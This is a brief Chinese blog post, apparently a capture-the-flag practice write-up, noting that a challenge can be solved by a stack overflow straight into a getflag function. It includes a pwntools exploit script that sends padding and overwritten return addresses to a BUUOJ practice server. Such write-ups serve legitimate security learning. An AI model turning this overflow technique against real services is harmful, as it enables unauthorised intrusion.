本文最后更新于 784 天前,其中的信息可能已经有所发展或是发生改变。
今天刷题的时候又学到个东西,这道题可以直接栈溢出到getflag的位置,然后拿到flag。
payload
from pwn import *
context.log_level = 'debug'
p = remote("node4.buuoj.cn",26382)
payload = b'a'*56
payload += p32(0x080489A0) + p32(0x0804E6A0)
payload += p32(0x308CD64F) + p32(0x195719D1)
p.sendline(payload)
sleep(0.1)
p.recv()
评论